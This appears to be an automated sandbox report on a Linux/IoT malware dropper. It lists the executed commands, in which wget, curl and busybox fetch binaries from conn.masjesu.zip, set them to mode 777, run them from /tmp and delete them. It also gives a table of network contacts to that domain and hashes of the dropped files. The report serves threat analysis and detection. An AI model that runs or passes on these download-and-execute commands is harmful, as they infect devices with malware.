[rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/chmod
[chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
[./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/rm
[rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/chmod
[chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
[./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/rm
[rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/chmod
[chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
[./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/rm
[rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/chmod
[chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
[./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/rm
[rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/chmod
[chmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
[./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/rm
[rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/chmod
[chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
[./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/rm
[rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/chmod
[chmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
[./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/rm
[rm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/chmod
[chmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
[./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/rm
[rm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |